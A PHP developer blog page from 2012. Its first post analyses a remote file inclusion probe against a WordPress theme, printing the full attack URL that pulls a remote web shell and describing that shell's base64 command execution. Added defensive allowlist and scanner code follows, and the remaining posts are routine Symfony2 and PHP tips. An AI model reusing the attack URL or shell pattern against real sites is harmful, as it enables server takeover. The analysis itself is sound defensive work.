Random vulnerability dissected

Posted February 1st, 2012 in Razno by Metod

Recently, I received a 404 notification for the following URL:

http://www.metod.si/wp-content/themes/myweblog/thumb.php?src=http://picasa.com.jcibuenosaires.com.ar/2.php

Apparently the myweblog WordPress theme had (and maybe still has) an RFI (remote file inclusion) vulnerability in thumb.php.
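The host in the logged URL begins with picasa.com but belongs to an unrelated domain, which is exactly the shape of request that slips past a substring-based host allowlist. As an added example that is not the theme's code, here is that weak check next to a strict one built on parse_url(); the allowlist contents and the function names are assumptions.

```php
<?php
// Added example, not the theme's code. Both functions take the value of the
// "src" parameter; the allowlist below is a constructed assumption.
$allowedHosts = array('picasa.com', 'flickr.com');

// Weak check: strpos() matches the allowed name anywhere in the URL, so a
// host like picasa.com.<anything> (or a path containing "picasa.com") passes.
function isAllowedSubstring($url, array $allowedHosts)
{
    foreach ($allowedHosts as $allowed) {
        if (strpos($url, $allowed) !== false) {
            return true;
        }
    }
    return false;
}

// Strict check: parse the URL, require http or https, and compare the host
// component exactly or as a dot-separated subdomain of an allowed name.
// Using the parsed host also keeps "user@host" tricks out of the comparison.
function isAllowedHost($url, array $allowedHosts)
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return false;
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($allowedHosts as $allowed) {
        $allowed = strtolower($allowed);
        $suffix  = '.' . $allowed;
        if ($host === $allowed || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// The URL from the 404 notification above; compare the two verdicts.
$url = 'http://picasa.com.jcibuenosaires.com.ar/2.php';
var_dump(isAllowedSubstring($url, $allowedHosts));
var_dump(isAllowedHost($url, $allowedHosts));
```

The substring check lets the logged URL through, the host comparison rejects it; the same host comparison should be applied before any fetched content is written anywhere a web server might execute it.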

Fortunately I do not use that theme. But I had to wonder what was inside the “2.php” file, so I downloaded it. :)

What was inside?

The file first tries to disguise itself as a GIF image by starting with the GIF89a header. After the binary data, though, it contains PHP code.
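A file that starts with a GIF header and still contains a PHP open tag is exactly this disguise. As an added example, not from the post, here is a small scanner for such polyglots that can be pointed at an uploads or thumbnail cache directory; the directory and the sample files are constructed.

```php
<?php
// Added example, not from the post: flag files that begin with a GIF
// header yet also contain a PHP open tag, the disguise used by 2.php.

function looksLikeGifPhpPolyglot($path)
{
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    $magic = fread($fh, 6);
    fclose($fh);
    if ($magic !== 'GIF89a' && $magic !== 'GIF87a') {
        return false; // does not claim to be a GIF, out of scope here
    }
    // A real GIF has no reason to carry "<?php", "<?=" or "<? " after the header.
    $data = file_get_contents($path);
    return preg_match('/<\?(?:php\b|=|\s)/i', $data) === 1;
}

function scanForPolyglots($dir)
{
    $hits = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile() && looksLikeGifPhpPolyglot($file->getPathname())) {
            $hits[] = $file->getPathname();
        }
    }
    return $hits;
}

// Constructed samples: a minimal GIF header, once followed by a harmless
// PHP tag (the polyglot) and once by a plain trailer byte (a real image).
$dir = sys_get_temp_dir() . '/polyglot-demo';
is_dir($dir) || mkdir($dir);
$gifHeader = "GIF89a\x01\x00\x01\x00\x80\x00\x00";
file_put_contents($dir . '/2.php',    $gifHeader . "<?php echo 'marker'; ?>");
file_put_contents($dir . '/real.gif', $gifHeader . "\x3b");
print_r(scanForPolyglots($dir));
```

Only 2.php is reported; file_get_contents() reads whole files, so add a size limit before running this over a large cache.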

The PHP code is straightforward: if you add &lol=1, the first block runs; if you add &osc=pZ…AA=, the second block runs; otherwise the third one does.

What does the first block do?

Well, nothing special. It just identifies the vulnerability and outputs some system information.

Example: v0pCr3wsys:Linux …nob0dyCr3w

The second block is practically the same, except that it takes commands directly from the URL.

  <?php

  $cmd = base64_decode($osc);

Just append &osc=some_base64_encoded_command and it will execute it (if possible).

The third block is an editor that tries to upload files, create them, etc.

Quite a script. It also shows that you always have to validate user input. That really cannot be stressed enough.

Serialization of UploadedFile is not allowed fix

Posted January 31st, 2012 in Razno by Metod

If you are doing file uploads in Symfony2 with help from the cookbook tutorial, you might have run into the following error:

Serialization of 'Symfony\Component\HttpFoundation\File\UploadedFile' is not allowed.

The solution I came up with involves excluding the public $file field from serialization. That way we bypass the exception.

One catch, though: this will exclude all fields that are not protected.

Add the following function to your entity:
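As an added illustration that is not the post's own function, one way to write such a __sleep() is to return only the protected property names, so the public $file is never serialized; the Document entity below is a hypothetical shape modelled on the cookbook's entity.

```php
<?php
// Added example, not the post's own function. Assumes the entity keeps its
// persisted fields protected and the upload as "public $file", as in the cookbook.
use Symfony\Component\HttpFoundation\File\UploadedFile;

class Document
{
    protected $id;
    protected $name;
    protected $path;

    /** @var UploadedFile|null Not mapped by Doctrine and must not be serialized */
    public $file;

    public function __sleep()
    {
        // Return only protected property names: $file and every other public
        // field stay out of the serialized form. __CLASS__ (not get_class($this))
        // keeps properties added by Doctrine proxy subclasses out of the list.
        $names = array();
        $ref = new \ReflectionClass(__CLASS__);
        foreach ($ref->getProperties(\ReflectionProperty::IS_PROTECTED) as $prop) {
            $names[] = $prop->getName();
        }
        return $names;
    }
}

$doc = new Document();
// SplFileInfo, which UploadedFile extends, refuses to be serialized with the
// same "Serialization of ... is not allowed" error, so it is a faithful stand-in.
$doc->file = new \SplFileInfo(__FILE__);
$copy = unserialize(serialize($doc));
var_dump($copy->file); // skipped by __sleep(), so the property keeps its default
```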

Enjoy!

Check if symfony2 form has errors in a twig template

Posted January 16th, 2012 in Razno by Metod

MySQL CHAR_LENGTH function for Doctrine2

Posted January 15th, 2012 in Projects by Metod

Today I needed the CHAR_LENGTH function for use in DQL in a Doctrine2 project. So I wrote one myself and sent a pull request to DoctrineExtensions to contribute it to the open-source community.

You can get the file on github:

CharLength.php

And a quick tip on how to activate it in Symfony2:
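As an added example, not the contributed CharLength.php itself, here is the shape such a DQL function takes in Doctrine 2 and how it is registered; the namespace and the sample entity are hypothetical.

```php
<?php
// Added example, not the contributed CharLength.php: a Doctrine 2 DQL
// function node that renders CHAR_LENGTH(<string expression>) as the MySQL
// CHAR_LENGTH() call. The namespace below is hypothetical.
namespace Acme\DemoBundle\DQL;

use Doctrine\ORM\Query\AST\Functions\FunctionNode;
use Doctrine\ORM\Query\Lexer;
use Doctrine\ORM\Query\Parser;
use Doctrine\ORM\Query\SqlWalker;

class CharLength extends FunctionNode
{
    /** @var \Doctrine\ORM\Query\AST\Node the single string argument */
    public $stringPrimary;

    // Called by the DQL parser: consume "CHAR_LENGTH ( StringPrimary )".
    public function parse(Parser $parser)
    {
        $parser->match(Lexer::T_IDENTIFIER);
        $parser->match(Lexer::T_OPEN_PARENTHESIS);
        $this->stringPrimary = $parser->StringPrimary();
        $parser->match(Lexer::T_CLOSE_PARENTHESIS);
    }

    // Called by the SQL walker: the argument is walked by the walker (so bound
    // parameters stay parameters) rather than concatenated as raw input.
    public function getSql(SqlWalker $sqlWalker)
    {
        return 'CHAR_LENGTH(' . $sqlWalker->walkStringPrimary($this->stringPrimary) . ')';
    }
}

// Registration. With plain Doctrine:
//   $em->getConfiguration()->addCustomStringFunction('CHAR_LENGTH', 'Acme\DemoBundle\DQL\CharLength');
// In Symfony2, in app/config/config.yml:
//   doctrine:
//       orm:
//           dql:
//               string_functions:
//                   CHAR_LENGTH: Acme\DemoBundle\DQL\CharLength
// Afterwards DQL like "SELECT p FROM AcmeDemoBundle:Post p WHERE CHAR_LENGTH(p.title) > 10" parses.
```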

How to install igbinary serializer for PHP

Posted December 13th, 2011 in Razno by Metod

This is a short step-by-step tutorial on how to install igbinary for PHP when you have multiple versions of PHP installed.

First off, you have to use the binaries that belong to the PHP version you wish to install the extension for.

1. Go to GitHub and download/unzip the files.
2. Go into the folder you just unzipped.
3. Run phpize. If you don’t have the proper phpize binary in your global configuration, just use the full path to it. I have PHP version 5.3.8 installed with phpfarm, so I will use that phpize.

  /usr/local/php/inst/php-5.3.8/bin/phpize

4. Configure it. Make sure you put the full path to your php-config, otherwise it will not work!

  ./configure CFLAGS="-O2 -g" --enable-igbinary --with-php-config=/usr/local/php/inst/php-5.3.8/bin/php-config

5. Compile and install.
6. Add the following to your php.ini:

  extension=igbinary.so
  session.serialize_handler=igbinary
  igbinary.compact_strings=On
  apc.serializer=igbinary ; only if you want APC to use igbinary

7. Restart Apache (assuming you run Apache).

And you should see igbinary support in your phpinfo().

Symfony2 Error: UsernamePasswordToken::serialize() must return a string or NULL

Posted December 5th, 2011 in Razno by Metod

Getting the following error? Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken::serialize() must return a string or NULL

I was getting it while trying to login a user. The thing was, in my Role entity, all properties were private.

  class Role implements RoleInterface
  {
      private $id;

      private $name;

      private $created_at;

      // …
  }

While googling and checking things out, I found a comment on php.net which gave me an idea. I changed all private properties to protected and things worked!

  class Role implements RoleInterface
  {
      protected $id;

      protected $name;

      protected $created_at;

      // …
  }

Symfony2 tip: Get current route name in twig template

Posted December 5th, 2011 in Snippets by Metod

  {{ app.request.attributes.get('_route') }}

Enjoy! ;)

Eclipse – Adding Files to Git Index problem

Posted December 4th, 2011 in Zanimivosti by Metod

Encountering the following error in Eclipse/Zend Studio while trying to add files in Git?

Adding Files to Git Index problem

Check if a file ‘index.lock’ exists in the .git folder located in the root folder of your project.

If so, remove it and you can continue working!

  rm .git/index.lock

How to use Pagerfanta with Symfony2 and Doctrine2

Posted November 27th, 2011 in Tehnikalije by Metod

So let’s assume you want to use a pager with your Symfony2 application. If you are like me, you type it into Google and get a link to KnpPaginatorBundle. You start using it and everything goes well, until you hit an error telling you something is wrong. That something is a query along the lines of:

  SELECT SUM(S.STH) AS something FROM

Which Zend_Paginator does not support! Here is where Pagerfanta comes into the picture.

Download PagerfantaBundle or get it through git, and get Pagerfanta as well. I decided to split PagerfantaBundle into two more folders, so the structure of the bundle is now:

  vendor\bundles\WhiteOctober\PagerfantaBundle\…

For Pagerfanta, the structure is:

  vendor\pagerfanta\src\…

Now, add both to autoload:

  // app/autoload.php
  $loader->registerNamespaces(array(
      // …
      'WhiteOctober'     => __DIR__.'/../vendor/bundles',
      'Pagerfanta'       => __DIR__.'/../vendor/pagerfanta/src',
      // …
  ));

Register the bundle with your application kernel:

  // app/AppKernel.php
  public function registerBundles()
  {
      return array(
          // …
          new WhiteOctober\PagerfantaBundle\WhiteOctoberPagerfantaBundle(),
          // …
      );
  }

Now what the official documentation does not tell you is what namespaces to include to use it.

For Doctrine2 the example Controller looks like this:
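As an added illustration, not the post's own controller, this is the kind of action that feeds the {{ pagerfanta(examples) }} call used in the view; the use statements show the Pagerfanta namespaces needed, while the bundle, entity and template names are hypothetical.

```php
<?php
// Added example, not the post's own controller. Assumes a hypothetical
// "Example" entity in AcmeDemoBundle and a route with a {page} parameter.
namespace Acme\DemoBundle\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpKernel\Exception\NotFoundHttpException;
use Pagerfanta\Pagerfanta;
use Pagerfanta\Adapter\DoctrineORMAdapter;
use Pagerfanta\Exception\NotValidCurrentPageException;

class ExampleController extends Controller
{
    public function listAction($page)
    {
        // Any DQL query works here, including aggregates like SUM() that
        // the Zend_Paginator-based approach choked on.
        $query = $this->getDoctrine()->getEntityManager()
            ->createQuery('SELECT e FROM AcmeDemoBundle:Example e ORDER BY e.id DESC');

        $pagerfanta = new Pagerfanta(new DoctrineORMAdapter($query));
        $pagerfanta->setMaxPerPage(20);
        try {
            // $page comes from the URL: a non-numeric, zero or out-of-range
            // value becomes a clean 404 instead of an exception page.
            $pagerfanta->setCurrentPage((int) $page);
        } catch (NotValidCurrentPageException $e) {
            throw new NotFoundHttpException('Page not found', $e);
        }

        // "examples" is the variable the view passes to {{ pagerfanta(examples) }}.
        return $this->render('AcmeDemoBundle:Example:list.html.twig', array(
            'examples' => $pagerfanta,
        ));
    }
}
```

In the template, loop over examples.currentPageResults for the rows and call pagerfanta(examples) for the navigation links.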

In the view (I assume you are using Twig) you just do:

  {{ pagerfanta(examples) }}

And you’re done!

However, there is much more to Pagerfanta. You can pass in many configuration options, and this is where Twig’s so-called global variables come in handy. You can define them in app/config/config.yml:

  twig:
      globals:
          pagerfanta_opts:
              previous_message: '&laquo;'
              next_message:     '&raquo;'
              dots_message:     ' … '

Now you can access the ‘pagerfanta_opts’ in every template:

  {{ pagerfanta(examples, 'default', pagerfanta_opts) }}

Where ‘default’ is the name of the Pagerfanta view.

For those who want to learn more about it, read the documentation on GitHub for Pagerfanta.

PHP Fatal error: Call to undefined function get_option()

Posted November 27th, 2011 in Razno by Metod

Getting the following error when trying to access your wp-admin/ panel in WordPress?

I had the same. I re-uploaded all files, and nothing changed. Then it crossed my mind: what if APC is doing something weird? Turns out it was!

So, if you are getting this error and you have APC installed, set the following option to "0".

  apc.include_once_override="0"